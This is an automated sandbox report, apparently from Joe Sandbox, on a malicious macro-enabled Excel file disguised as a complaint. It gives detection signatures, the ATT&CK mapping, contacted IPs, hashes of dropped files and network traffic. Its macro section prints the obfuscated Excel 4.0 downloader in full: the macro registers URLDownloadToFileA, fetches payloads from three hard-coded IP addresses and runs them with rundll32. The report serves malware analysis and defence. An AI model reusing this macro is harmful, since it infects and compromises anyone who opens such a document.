Analysis Report Complaint_1713723004_04122021.xlsm
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | Memory has grown: |
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Extra Window Memory Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution11 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting2 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
37.46.133.194 | unknown | Russian Federation | 29182 | THEFIRST-ASRU | false | |
185.212.129.66 | unknown | Germany | 200313 | INTERNET-ITNL | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 386500 |
Start date: | 14.04.2021 |
Start time: | 11:21:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Complaint_1713723004_04122021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSM@1/7@0/2 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37.46.133.194 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
185.212.129.66 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
THEFIRST-ASRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
INTERNET-ITNL | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 158055 |
Entropy (8bit): | 7.981278766139217 |
Encrypted: | false |
SSDEEP: | 3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl |
MD5: | CB67CED3017DF7803FBA5D86FCEB4276 |
SHA1: | C7B8B4A44BDF7F7775F61FCF236A0834CB321733 |
SHA-256: | C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1 |
SHA-512: | 1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 173575 |
Entropy (8bit): | 7.961400788755953 |
Encrypted: | false |
SSDEEP: | 3072:MadXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGv7:MahE5SDvbXAyHbVt15wTQDS |
MD5: | 83E146A0F9EB837C5481B3226786DACE |
SHA1: | 2D2B69F47EEBCE4C93F515D2A21FC1A954C29E66 |
SHA-256: | 8EBB3FD109500D3D2282FFD88BCB7FD827104F3B481767ECDAFA002CB02AF373 |
SHA-512: | E6A1E8BDD5EDFD5D186CD27FBAA501956AD6D44D07CC6A9A4DEEAEE56A50567C76BD843AAF7684E6A7B87413DF2F14BCE902F23BF7009FD5A684230083F5E9C5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2228 |
Entropy (8bit): | 4.529554610227899 |
Encrypted: | false |
SSDEEP: | 48:8ORQP/XT3IkAIKCWSIM+Qh2ORQP/XT3IkAIKCWSIM+Q/:8ORy/XLIkx+Qh2ORy/XLIkx+Q/ |
MD5: | 80BFB8AF461F58FD059D25A3CA325D8B |
SHA1: | B8D3CC5A08981066974785C760FD4B561E3B9B7D |
SHA-256: | 873E66A12B5AD4DABC592D6209529361E72E21154918C64A6B689C0776C9FD7C |
SHA-512: | CF3FA757076F0E8B02E43780E63E87FFBD1363A5E03C08A26564EBAE71F8311444A7D0BC3AF722A356CEF5F61B22C1405EFFCB405B3BEEF0927B8479FC95A46E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.472116605142472 |
Encrypted: | false |
SSDEEP: | 12:85QEKLgXg/XAlCPCHaXgzB8IB/WMkX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJP8:85T8/XTwz6I0zYefbDv3q+rNru/ |
MD5: | 64DEBF1A6B821E4984CEF996E356B28B |
SHA1: | 19438F0774CFAE0B5B5077A5E7305BCA84EA5858 |
SHA-256: | 008F94E34907D281B905394BACBB4596728728DEF9629B6192F48B04E835BAFA |
SHA-512: | B5EB20D3F3090F37731DB6582F58B60F0C17060A94168B6E7C6981862CAB3D6121EA029C26FF6D16DF65D8266863C7EA463D5AD843E5F3171060A6E69F9068C3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 142 |
Entropy (8bit): | 4.613891707512004 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWt1l6eW6VR4pl+1l6eW6VR4plmxWt1l6eW6VR4plv:dje1lvUpalvUpz1lvUp1 |
MD5: | 7A1D090B833A0EAC78BD895AFDBDD21A |
SHA1: | EC1771847A82C98025F77FD95D44CFC03C0B1869 |
SHA-256: | 94E9CBBA52095BFCF6B9BB6BC82B93CF0B857B27BA38D345BEBB7D5E9D264A8F |
SHA-512: | 64CA804BF65FC872BC1AE462F9B396D6D0906E409A5FEED516044C039C745A033CC164D0F44C400217E64EB354BA5D53E2D52389707839F53DFA314B5C1FA56C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 173575 |
Entropy (8bit): | 7.961400788755953 |
Encrypted: | false |
SSDEEP: | 3072:MadXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGv7:MahE5SDvbXAyHbVt15wTQDS |
MD5: | 83E146A0F9EB837C5481B3226786DACE |
SHA1: | 2D2B69F47EEBCE4C93F515D2A21FC1A954C29E66 |
SHA-256: | 8EBB3FD109500D3D2282FFD88BCB7FD827104F3B481767ECDAFA002CB02AF373 |
SHA-512: | E6A1E8BDD5EDFD5D186CD27FBAA501956AD6D44D07CC6A9A4DEEAEE56A50567C76BD843AAF7684E6A7B87413DF2F14BCE902F23BF7009FD5A684230083F5E9C5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.962037667569484 |
TrID: |
|
File name: | Complaint_1713723004_04122021.xlsm |
File size: | 174329 |
MD5: | a4c21b67f5b8a52b143697fad19fadba |
SHA1: | bdb665fe0760a6d568a269e0c792bf6a2284568b |
SHA256: | 254e090511681f16592a5afc242f0ded71c03a4a15292117f06a24aaad59fc19 |
SHA512: | 5e1554ff6f3f1859abdb5ff2ed74aec8f70bf14fbf67ab06e1e7cd6bc2c75d671d0dda94f0b733c2fb6a08f38eec667c1eebca06506808b0a5f6a55a0336ff0c |
SSDEEP: | 3072:vXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDG5:PE5SDvbXAyHbVt15wTQDi |
File Content Preview: | PK..........!.... ....4.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Complaint_1713723004_04122021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Hi!D1)
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Jo!E3)
,,=NOW(),,,,,,,,"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=FORMULA(CC280&CC281,CE271)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()",,,,,,,"=CONCATENATE(CC274,CD266,CC273)",,,,,,,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)=NOW()=NOW()",JJCCJJ,,,,,,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,,,,,,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,,,,,,"=""http://37.46.133.194/""",,,,,,,,"=""http://185.212.129.66/""",,,,,,,,"=""http://190.14.37.248/""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URLDown,,,,,,,,loadToFileA,,,,,,,,,,,,,,,,,=GOTO(Ger!G10),,,,,,
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=HALT()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 14, 2021 11:23:04.168615103 CEST | 49167 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:07.186959028 CEST | 49167 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:13.193677902 CEST | 49167 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:25.209192991 CEST | 49168 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:28.217830896 CEST | 49168 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:34.224195957 CEST | 49168 | 80 | 192.168.2.22 | 37.46.133.194 |
Apr 14, 2021 11:23:46.285542965 CEST | 49169 | 80 | 192.168.2.22 | 185.212.129.66 |
Apr 14, 2021 11:23:49.295207977 CEST | 49169 | 80 | 192.168.2.22 | 185.212.129.66 |
Apr 14, 2021 11:23:55.301565886 CEST | 49169 | 80 | 192.168.2.22 | 185.212.129.66 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 11:21:39 |
Start date: | 14/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f3f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|